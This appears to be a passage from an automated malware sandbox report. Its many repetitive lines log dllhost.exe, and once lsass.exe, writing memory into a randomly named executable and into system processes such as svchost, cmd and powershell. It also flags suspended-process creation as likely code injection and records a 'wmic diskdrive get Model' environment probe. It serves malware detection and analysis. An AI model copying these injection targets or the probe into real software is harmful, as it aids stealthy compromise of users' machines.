Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 10E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 620000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BF59D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 253FC3D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2A5AF330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A4670000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1780D3E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BF59D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 253FC3D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2A5AF330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A46A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1780D3E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 21D595A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 21D59C90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1EA080B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085AEE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085CF50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 29E3BCD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 29E3BF00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1956F090000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2A3ED7F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CD8E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CF9E0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085CF30000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
